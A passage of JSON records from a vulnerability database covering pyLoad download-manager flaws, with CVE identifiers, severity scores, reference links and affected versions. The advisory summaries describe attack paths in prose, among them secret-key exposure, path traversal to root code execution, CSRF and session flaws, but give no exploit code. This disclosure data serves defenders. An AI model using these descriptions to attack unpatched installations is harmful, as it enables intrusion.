:M/B:A/M:M/D:R/2026-04-22T18:31:55Z/"}],"url":"https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1"},{"reference_url":"https://github.com/advisories/GHSA-66hx-chf7-3332","reference_id":"GHSA-66hx-chf7-3332","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-66hx-chf7-3332"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-66hx-chf7-3332","reference_id":"GHSA-66hx-chf7-3332","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T18:31:55Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-66hx-chf7-3332"}],"fixed_packages":[],"aliases":["CVE-2026-41133","GHSA-66hx-chf7-3332"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kjru-xrvh-1bad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48570?format=json","vulnerability_id":"VCID-ktv2-2ay9-g7be","summary":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-21644","reference_id":"","reference_type":"","scores":[{"value":"0.89284","scoring_system":"epss","scoring_elements":"0.9956","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-21644"},{"reference_url":"https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40","reference_id":"bb22063a875ffeca357aaf6e2edcd09705688c40","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-01-09T19:55:57Z/"}],"url":"https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21644","reference_id":"CVE-2024-21644","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21644"},{"reference_url":"https://github.com/advisories/GHSA-mqpq-2p68-46fv","reference_id":"GHSA-mqpq-2p68-46fv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mqpq-2p68-46fv"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv","reference_id":"GHSA-mqpq-2p68-46fv","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-01-09T19:55:57Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28288?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev77","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rh3z-nqp8-eqfa"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-x9sy-hcqs-pke5"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev77"}],"aliases":["CVE-2024-21644","GHSA-mqpq-2p68-46fv"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ktv2-2ay9-g7be"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84141?format=json","vulnerability_id":"VCID-kz5g-9as8-g7aw","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40071","reference_id":"","reference_type":"","scores":[{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.12248","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40071"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40071","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40071"},{"reference_url":"https://github.com/advisories/GHSA-rfgh-63mg-8pwm","reference_id":"GHSA-rfgh-63mg-8pwm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rfgh-63mg-8pwm"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm","reference_id":"GHSA-rfgh-63mg-8pwm","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:09:08Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm"}],"fixed_packages":[],"aliases":["CVE-2026-40071","GHSA-rfgh-63mg-8pwm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kz5g-9as8-g7aw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359876?format=json","vulnerability_id":"VCID-nukv-bju1-auht","summary":"pyLoad's Session Not Invalidated After Permission Changes\n### Summary\nThe `pyload` application does not properly invalidate or modify sessions upon changes made to a user's permissions.\n\n### Details\nWhenever an administrator changes the permissions a specific account has, they do not expect that account still being able to access data that their new permissions do not allow. This is not the case for the `pyload` application, as a user with a valid session can still perform the actions.\n\n### PoC\nTake a user with all the permissions, as shown below.\n![image](https://user-images.githubusercontent.com/44903767/294956335-0e4da84f-bf9a-42c8-87f1-f5ff35967c63.png)\n\nWe now log in as this user.\n![image](https://user-images.githubusercontent.com/44903767/294956539-ac6805fe-957d-4289-8ca9-2f3b6b2878a3.png)\n\nLet us now take away all the permissions.\n![image](https://user-images.githubusercontent.com/44903767/294956689-757e6e08-03fd-42eb-b4a5-1ceefa6c24ed.png)\n\nThe logged in session can still be used to access everything in the application.\n![image](https://user-images.githubusercontent.com/44903767/294956943-fa0f23c0-a28c-4eed-89d6-1cc074feda6d.png)\n\n### Impact\nShould permissions be taken away, then the user is expected not to be able to execute the actions belonging to those actions anymore.","references":[{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-fj52-5g4h-gmq8","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-fj52-5g4h-gmq8"},{"reference_url":"https://github.com/advisories/GHSA-fj52-5g4h-gmq8","reference_id":"GHSA-fj52-5g4h-gmq8","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fj52-5g4h-gmq8"}],"fixed_packages":[],"aliases":["GHSA-fj52-5g4h-gmq8"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nukv-bju1-auht"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/87937?format=json","vulnerability_id":"VCID-r5mf-vf91-nfgs","summary":"pyLoad is the free and open-source Download Manager written in pure Python. In versions 0.5.0b3.dev89 and below, there is an opportunity for path traversal in pyLoad-ng CNL Blueprint via package parameter, allowing Arbitrary File Write which leads to Remote Code Execution (RCE). The addcrypted endpoint in pyload-ng suffers from an unsafe path construction vulnerability, allowing unauthenticated attackers to write arbitrary files outside the designated storage directory. This can be abused to overwrite critical system files, including cron jobs and systemd services, leading to privilege escalation and remote code execution as root. This issue is fixed in version 0.5.0b3.dev90.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54802","reference_id":"","reference_type":"","scores":[{"value":"0.02893","scoring_system":"epss","scoring_elements":"0.86633","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54802"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54802","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54802"},{"reference_url":"https://github.com/pyload/pyload/pull/4596","reference_id":"4596","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/"}],"url":"https://github.com/pyload/pyload/pull/4596"},{"reference_url":"https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4","reference_id":"70a44fe02c03bce92337b5d370d2a45caa4de3d4","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/"}],"url":"https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4"},{"reference_url":"https://github.com/advisories/GHSA-48rp-jc79-2264","reference_id":"GHSA-48rp-jc79-2264","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-48rp-jc79-2264"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264","reference_id":"GHSA-48rp-jc79-2264","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/91196?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev90","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev90"}],"aliases":["CVE-2025-54802","GHSA-48rp-jc79-2264"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5mf-vf91-nfgs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/62281?format=json","vulnerability_id":"VCID-rh3z-nqp8-eqfa","summary":"pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-22416","reference_id":"","reference_type":"","scores":[{"value":"0.05898","scoring_system":"epss","scoring_elements":"0.90807","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-22416"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml"},{"reference_url":"https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e","reference_id":"1374c824271cb7e927740664d06d2e577624ca3e","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/"}],"url":"https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e"},{"reference_url":"https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc","reference_id":"c7cdc18ad9134a75222974b39e8b427c4af845fc","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/"}],"url":"https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-22416","reference_id":"CVE-2024-22416","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-22416"},{"reference_url":"https://github.com/advisories/GHSA-pgpj-v85q-h5fm","reference_id":"GHSA-pgpj-v85q-h5fm","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pgpj-v85q-h5fm"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm","reference_id":"GHSA-pgpj-v85q-h5fm","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28454?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev78","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev78"}],"aliases":["CVE-2024-22416","GHSA-pgpj-v85q-h5fm","PYSEC-2024-17"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rh3z-nqp8-eqfa"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84256?format=json","vulnerability_id":"VCID-rynb-u84j-7khx","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev98, the set_session_cookie_secure before_request handler in src/pyload/webui/app/__init__.py reads the X-Forwarded-Proto header from any HTTP request without validating that the request originates from a trusted proxy, then mutates the global Flask configuration SESSION_COOKIE_SECURE on every request. Because pyLoad uses the multi-threaded Cheroot WSGI server (request_queue_size=512), this creates a race condition where an attacker's request can influence the Secure flag on other users' session cookies — either downgrading cookie security behind a TLS proxy or causing a session denial-of-service on plain HTTP deployments. This vulnerability is fixed in 0.5.0b3.dev98.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40594","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01346","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40594"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-125.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-125.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40594","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40594"},{"reference_url":"https://github.com/advisories/GHSA-mp82-fmj6-f22v","reference_id":"GHSA-mp82-fmj6-f22v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mp82-fmj6-f22v"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-mp82-fmj6-f22v","reference_id":"GHSA-mp82-fmj6-f22v","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T18:01:27Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-mp82-fmj6-f22v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/81710?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev69","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d2gv-3uu7-gudh"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-ktv2-2ay9-g7be"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rh3z-nqp8-eqfa"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-x9sy-hcqs-pke5"},{"vulnerability":"VCID-xkag-9scb-bfhk"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev69"},{"url":"http://public2.vulnerablecode.io/api/packages/93074?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev98","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"}],"resource_url":"http://public2.vulnerablecode.io/